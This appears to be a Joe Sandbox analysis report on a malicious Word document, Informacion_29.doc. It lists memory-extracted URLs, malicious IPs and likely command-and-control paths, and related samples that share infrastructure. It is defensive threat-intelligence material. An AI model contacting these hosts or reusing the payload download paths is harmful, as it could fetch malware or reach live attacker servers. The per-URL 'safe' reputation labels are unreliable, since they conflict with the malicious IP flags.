https://api.aadrm.com/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://d-cem.com	powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://00zyku.comx	powershell.exe, 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ketoresetme.com/author/admin/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ketoresetme.com/category/keto-summit/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://api.microsoftstream.com/api/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://cr.office.com	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	false		high
https://ketoresetme.com/xmlrpc.p	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.281319093.0000018A14071000.00000004.00000001.sdmp	false		high
http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ketoresetme.com/category/keto-news/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://tasks.office.com	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://ketoresetme.com/xmlrpc.php	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://00zyku.com	powershell.exe, 00000004.00000002.289183876.0000018A152D0000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://officeci.azurewebsites.net/api/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	Avira URL Cloud: safe	unknown
https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.letsencrypt.org0	powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp	false		high
https://rajwap.pro/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://wheelcomoving.com/company/contact/	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://ketoresetme.com/contact-us/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.odwebp.svc.ms	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://web.microsoftstream.com/video/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://graph.windows.net	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp	false		high
https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://arabysexy.mobi/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.t	svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://dirtyindianporn.info/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://weather.service.msn.com/data.aspx	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://wheelcomoving.com/services/ocean-cargo/	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://ketoresetme.com/privacy-policy-2/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	false		high
http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/ios	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	false		high
https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://o365auditrealtimeingestion.manage.office.com	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://wheelcomoving.com/xmlrpc.php?rsd	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.office365.com/api/v1.0/me/Activities	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://entitlement.diagnostics.office.com	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://190.247.139.101/o7vtz/g3p9nxague/	rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp, rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://outlook.office.com/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://190.247.139.101/o7vtz/g3p9nxague/llc	rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://indianpornmovies.info/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ketoresetme.com/category/keto/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
66.85.46.76	unknown	United States	393960	HOST4GEEKS-LLCUS	true
152.170.79.100	unknown	Argentina	10318	TelecomArgentinaSAAR	true
58.97.195.135	unknown	Bangladesh	7470	TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH	true
190.247.139.101	unknown	Argentina	10318	TelecomArgentinaSAAR	true
35.214.169.246	unknown	United States	19527	GOOGLE-2US	true
193.187.117.26	unknown	Netherlands	55933	CLOUDIE-AS-APCloudieLimitedHK	true
70.32.23.58	unknown	United States	55293	A2HOSTINGUS	true
138.197.99.250	unknown	United States	14061	DIGITALOCEAN-ASNUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	336937
Start date:	07.01.2021
Start time:	11:52:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Informacion_29.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@24/17@5/9
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 25.8% (good quality ratio 24.9%) Quality average: 77.4% Quality standard deviation: 24.8%
HCA Information:	Successful, ratio: 83% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.88.40, 52.109.76.33, 104.43.193.48, 51.104.144.132, 23.210.248.85, 92.122.213.194, 92.122.213.247, 20.54.26.129, 205.185.216.42, 205.185.216.10, 51.103.5.159, 13.64.90.137, 40.88.32.150, 51.11.168.160, 52.255.188.83, 104.42.151.234 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net Execution Graph export aborted for target powershell.exe, PID 7064 because it is empty Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:52:56	API Interceptor	44x Sleep call for process: powershell.exe modified
11:53:15	API Interceptor	2x Sleep call for process: svchost.exe modified
11:54:30	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
66.85.46.76	Informacion_29.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	1923620_YY-5094713.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	Doc 2912 75513.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	DAT.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	4640-2912-122020.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	MENSAJE.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	Dati.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	ARCH.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	LIST_20201229_1397.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
	documento 2912 2020.doc	Get hash	malicious	Browse	wheelcomoving.com/p/RuMeRPa/
152.170.79.100	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100/jne6snt/m6myiohmse/
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100/gsyuaw2no20y/
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100/2w9radk/e1bqg93t32/bfbkkxnxm/kzpgfx0srz2azra2z6/wtvvr/zuhrx/
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100/udiwy/9lqzybri7w/n3qkg5seewustvns68/l36c10de4srgz133y/
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100/f5hvsm8p45k9/r0hin/g4fm3hzyqd5c/
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100/x6g2gr/bchg5i/1dw1veojm5/wx1zsm5gbt71xbtih/gqcr5rzmurhr33/
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100/g66ezlsi59l2qh9tcn/ydgp2y3srh2m5hj6/xkq9/wstqsdd/xpmc9zuidrre/
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100/8wjtai/6101dxx/4ggv7sw145lrki/
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100/7gfh58w8tuftcw/
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100/76ccih3j36ds48gflq/1agrdm9fi2y0wnk/3huzz5wj9w7/
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100/dwap/ulw9qv3rb7tn3pfmcvj/xibwt6769jdvwhte/zsns1d90vaps/f6yatsbh/
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100/hmjmchef7iewj2uvzf/9pltlpfikujmwtp/e6oaz9n/7m756y/bxs78/
	DAT.doc	Get hash	malicious	Browse	152.170.79.100/al700npvtnac1sp/hyv2ljkpgl5er/ftzaj/82949dvglj88n9/kr054l3td4qgcn0/zer9t3m/
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	152.170.79.100/9h5mkq4rscmn4p5/5i03xqzios0rjfom1p/7ryi6q8v0/iljhnekck1dpk9ng/0umxys8m7lmuc090/jj1uo/
	M3816067.doc	Get hash	malicious	Browse	152.170.79.100/jefmqa7pgn6/a7zeb1l6ir8p/iuii6qu/7x9123680/qwimc/kzg68jfg4cm59iv1/
	messaggio 2912.doc	Get hash	malicious	Browse	152.170.79.100/ldptrzs0lv336pjtc/s28dymelc06393/
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	152.170.79.100/bz77n5i0/aajfq5b2yw7yw59kt33/0ghoxzznyfa8bik7hm1/yiyb7xv8gihti8i/uqf8mgk7iy/
	Documento-2912-122020.doc	Get hash	malicious	Browse	152.170.79.100/iu4g99cxf8oc/
	Documento_I_2612.doc	Get hash	malicious	Browse	152.170.79.100/ipjai1r8tvftp/t2vqr6k1oq2jb2z38/f38ne62mhsuf3mdo/a1z9a6ur8zq6rvcxry/
	Archivo-29.doc	Get hash	malicious	Browse	152.170.79.100/doqyotvh2su6/gilkt2/qw7ipzh4umgoxfdc4gu/4alfk7j/m1en5ykrvqhpj/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
d-cem.com	Informacion_29.doc	Get hash	malicious	Browse	35.214.169.246
	TZ8322852306TL.doc	Get hash	malicious	Browse	35.214.169.246
	https://dj.4zido.de/i/612BRNn/	Get hash	malicious	Browse	35.214.169.246
ketoresetme.com	Informacion_29.doc	Get hash	malicious	Browse	70.32.23.58
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	70.32.23.58
	1923620_YY-5094713.doc	Get hash	malicious	Browse	70.32.23.58
	Doc 2912 75513.doc	Get hash	malicious	Browse	70.32.23.58
00zyku.com	Informacion_29.doc	Get hash	malicious	Browse	193.187.117.26
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	193.187.117.26
	1923620_YY-5094713.doc	Get hash	malicious	Browse	193.187.117.26
	Doc 2912 75513.doc	Get hash	malicious	Browse	193.187.117.26
wheelcomoving.com	Informacion_29.doc	Get hash	malicious	Browse	66.85.46.76
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	66.85.46.76
	1923620_YY-5094713.doc	Get hash	malicious	Browse	66.85.46.76
	Doc 2912 75513.doc	Get hash	malicious	Browse	66.85.46.76
	DAT.doc	Get hash	malicious	Browse	66.85.46.76
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	66.85.46.76
	4640-2912-122020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE.doc	Get hash	malicious	Browse	66.85.46.76
	Dati.doc	Get hash	malicious	Browse	66.85.46.76
	ARCH.doc	Get hash	malicious	Browse	66.85.46.76
	LIST_20201229_1397.doc	Get hash	malicious	Browse	66.85.46.76
	documento 2912 2020.doc	Get hash	malicious	Browse	66.85.46.76

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TelecomArgentinaSAAR	i	Get hash	malicious	Browse	181.170.3.37
	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100
	ARCHIVOFile.doc	Get hash	malicious	Browse	190.247.139.101
	Doc 2912 75513.doc	Get hash	malicious	Browse	190.247.139.101
	79685175.doc	Get hash	malicious	Browse	190.247.139.101
	DATI 2020.doc	Get hash	malicious	Browse	190.247.139.101
	7mB0FoVcSn.exe	Get hash	malicious	Browse	200.114.142.40
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100
	DAT.doc	Get hash	malicious	Browse	152.170.79.100
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	152.170.79.100
TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH	Informacion_29.doc	Get hash	malicious	Browse	58.97.195.135
	4WFF5Xwd2i.exe	Get hash	malicious	Browse	171.100.142.238
	https://bit.ly/2RzqidD?needed=felt	Get hash	malicious	Browse	110.170.129.101
	https://bit.ly/3iAFpzv?usually=girl	Get hash	malicious	Browse	110.170.129.101
	https://bodyfitline.in/cgi-bin/x8ij-010/	Get hash	malicious	Browse	119.76.191.158
HOST4GEEKS-LLCUS	Informacion_29.doc	Get hash	malicious	Browse	66.85.46.76
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	66.85.46.76
	1923620_YY-5094713.doc	Get hash	malicious	Browse	66.85.46.76
	Doc 2912 75513.doc	Get hash	malicious	Browse	66.85.46.76
	DAT.doc	Get hash	malicious	Browse	66.85.46.76
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	66.85.46.76
	4640-2912-122020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE.doc	Get hash	malicious	Browse	66.85.46.76
	Dati.doc	Get hash	malicious	Browse	66.85.46.76
	ARCH.doc	Get hash	malicious	Browse	66.85.46.76
	LIST_20201229_1397.doc	Get hash	malicious	Browse	66.85.46.76
	documento 2912 2020.doc	Get hash	malicious	Browse	66.85.46.76
	https://mysterygorillassafaris.com/notenotice/common/login	Get hash	malicious	Browse	185.221.216.3
	DHL Receipt_pdf.exe	Get hash	malicious	Browse	185.221.216.3
	HBL CreditCard.exe	Get hash	malicious	Browse	185.221.216.3
	Invoice_pdf.exe	Get hash	malicious	Browse	185.221.216.3
	Packing list_pdf.exe	Get hash	malicious	Browse	185.221.216.3
	http://mail.strantake.casa	Get hash	malicious	Browse	172.93.120.224
TelecomArgentinaSAAR	i	Get hash	malicious	Browse	181.170.3.37
	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100
	ARCHIVOFile.doc	Get hash	malicious	Browse	190.247.139.101
	Doc 2912 75513.doc	Get hash	malicious	Browse	190.247.139.101
	79685175.doc	Get hash	malicious	Browse	190.247.139.101
	DATI 2020.doc	Get hash	malicious	Browse	190.247.139.101
	7mB0FoVcSn.exe	Get hash	malicious	Browse	200.114.142.40
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100
	DAT.doc	Get hash	malicious	Browse	152.170.79.100
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	152.170.79.100

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	do15gc2q.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	SOA.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	INVOICE PACKING LIST Pdf.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	https://linkprotect.cudasvc.com/url?a=http%3a%2f%2ffindcloud.id%2fwp-includes%2f8JTmzq3FN6z3OBJBdBCfXrdcZl5H7ZxOaOZzfl2H%2f&c=E,1,2CiyC7FGbs3Pvr1yrAWkewOmRL-xyrP42HL37xX4omRyLZqRrqWOt_1RKb6pLtfzxs7zIBTrrVMEwQ8pOUIr2mFuNwrd9eHNrfkptUp83QPlV-CrGIoXMw,,&typo=1	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	https://northernprepsquad.uk/wp-content/C2SgD76AFgrcENck0bAOmz8LMoQDQN9C8XlsS16BNPCVrzJBNs/	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	Dhl paket.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	https://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	1HnGvXpvhg.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
